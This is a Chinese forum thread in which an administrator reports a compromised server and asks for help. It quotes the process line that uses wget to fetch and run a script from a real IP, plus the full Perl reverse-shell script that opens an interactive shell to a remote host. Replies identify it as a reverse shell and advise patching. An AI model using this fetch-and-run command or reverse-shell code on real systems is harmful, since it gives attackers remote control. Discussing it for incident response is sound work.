服务器被黑了?
今天维护服务器,发现进程中有一个可疑进程:
nobody 8717 17323 7 Jan11 ? 04:23:05 sh -c wget http://143.225.151.190/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 148.244.247.90 8080;wget
然后打开:http://143.225.151.190/libsh/ping.txt
发现内容如下?
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i")
高手替我分析一下。我应该采取什么措施?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(7)
Perl不太熟,熟悉的兄弟帮我分析一下。
148.244.247.90 8080的开了一个服务,用来监听。
然后上面的脚本执行了,会连接到上面的这个,然后本地执行system之中的命令,而且返回信息会发送到上面的链接。
这段代码是不是获取系统帐号密码的功能?
apache的用户为nobody,查了半天发现web没什么问题,大家谁碰过这情况,这IP是意大利的。郁闷~~
你可以在consol直接执行这个指令,看看输出如何:
复制代码
放心,直接执行,是在你的tty显示的
谢谢HonestQiao老前辈。
如果它在监听,说明它已经获取到这些信息了。
想不通这进程是如何产生的。不会系统已经被入侵?
但登录情况来看,没有异常。
被黑了 需要自己检查
Apache 被黑了,快打补丁吧。
Hacker 已经可以获得一个交互的 shell 了,很危险。